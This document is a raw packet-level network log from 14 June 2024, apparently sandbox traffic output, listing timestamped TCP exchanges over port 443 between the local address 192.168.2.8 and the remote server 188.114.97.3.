Jun 14, 2024 15:15:05.396560907 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.396584034 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.396599054 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.396624088 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.396652937 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.396681070 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.397165060 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.397197008 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.397234917 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.397239923 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.398011923 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.398036003 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.398056984 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.398060083 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.398066998 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.398091078 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.398094893 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.398133039 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.398137093 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.416148901 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.416234016 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.416260958 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.416364908 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.416399002 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.416423082 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.416423082 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.416436911 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.416496992 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.458592892 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.513052940 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.513129950 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.513163090 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.513178110 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.513207912 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.513243914 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.513253927 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.513261080 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.513307095 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.513309956 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.513324022 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.513367891 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.513375044 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.514050961 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.514081955 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.514106989 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.514113903 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.514159918 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.514180899 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.514919996 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.514992952 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.515000105 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.515042067 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.515444994 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.515499115 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.516298056 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.516355038 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.516855955 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.516921043 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.532660007 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.532711983 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.532759905 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.532762051 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.532773018 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.532821894 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.532836914 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.533097029 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.533159018 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.533176899 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.533233881 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.630079985 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.630142927 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.630250931 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.630255938 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.630291939 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.630306005 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.630336046 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.630374908 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.630552053 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.630598068 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.630619049 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.630619049 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.630633116 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.630661011 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.630686045 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.631442070 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.631500006 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.631625891 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.631685019 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.632424116 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.632467031 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.632504940 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.632508993 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.632508993 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.632519007 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.632561922 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.633179903 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.633238077 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.633351088 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.633389950 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.633405924 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.633416891 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.633434057 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.634397030 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.634433031 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.634454012 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.634463072 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.634495974 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.634593010 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.634648085 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.634656906 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.634711027 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.649203062 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.649317980 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.649362087 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.649394035 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.649419069 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.649427891 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.649439096 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.649440050 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.649509907 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.649519920 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.649564028 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.653871059 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.653904915 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.653933048 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.653937101 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.653945923 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.653969049 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.653996944 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.653999090 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.654007912 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.654038906 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.656745911 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.656784058 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.656800985 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.656809092 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.656821966 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.656846046 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.747554064 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.747670889 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.747735023 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.747787952 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.747829914 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.747843027 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.747864008 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.747891903 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.747926950 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.747977972 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.748013020 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.748020887 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.748054981 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.748076916 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.748163939 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.748215914 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.748254061 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.748260975 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.748306036 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.748328924 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.752310038 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.752377033 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.752394915 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.752403975 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.752477884 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.752497911 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.752733946 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.752830029 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.752840996 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.752908945 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.753089905 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.753113985 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.753150940 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.753156900 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.753180027 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.753201008 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.753905058 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.753930092 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.753978968 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.753983974 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.754023075 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.754049063 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.754890919 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.754918098 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.754980087 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.754987001 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.755031109 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.755068064 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.755646944 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.755666018 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.755835056 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.755841970 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.755892992 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.765939951 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.765969038 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.766019106 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.766026020 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.766068935 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.766108990 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.766196966 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.766223907 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.766268969 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.766275883 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.766310930 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.766330957 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.766705036 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.766726017 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.766772032 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.766777992 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.766818047 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.766835928 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.766947031 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.766963959 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.767038107 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.767044067 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.767092943 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.767307997 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.767323971 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.767384052 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.767390966 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.767438889 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.864442110 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.864470959 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.864594936 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.864625931 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.864682913 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.864759922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.864778042 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.864840984 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.864847898 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.864933968 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.865048885 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.865068913 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.865133047 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.865139008 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.865180969 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.865272045 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.865293026 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.865350962 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.865356922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.865412951 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.865670919 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.865691900 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.865753889 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.865760088 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.865796089 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.866043091 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866064072 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866122961 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.866128922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866175890 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.866231918 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866252899 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866293907 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.866300106 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866331100 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.866355896 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.866833925 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866852045 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866900921 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866935968 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.866936922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866955042 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.866978884 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.867010117 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.867362022 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.867379904 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.867448092 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.867454052 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.867465019 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.873677015 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.873701096 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.873780966 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.873789072 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.873814106 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.873819113 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.873836994 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.873872995 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.873879910 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.873910904 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.873987913 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874007940 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874053001 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.874063969 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874133110 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.874165058 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874181032 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874241114 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.874248981 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874320984 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874339104 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874377012 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.874382973 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874408007 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.874448061 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874461889 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874509096 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.874516964 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874567032 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.874737978 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874756098 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874818087 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.874825001 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874933958 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.874948025 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.875004053 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.875016928 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.882432938 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.882461071 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.882517099 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.882528067 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.882554054 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.890202999 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890244007 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890292883 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.890325069 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890342951 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.890398979 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890445948 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890477896 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.890486002 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890518904 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.890618086 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890656948 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890685081 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.890692949 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890717983 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.890821934 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890868902 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890882015 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.890909910 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.890949011 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.891067982 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891108036 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891138077 CEST	49707	443	192.168.2.8	188.114.97.3
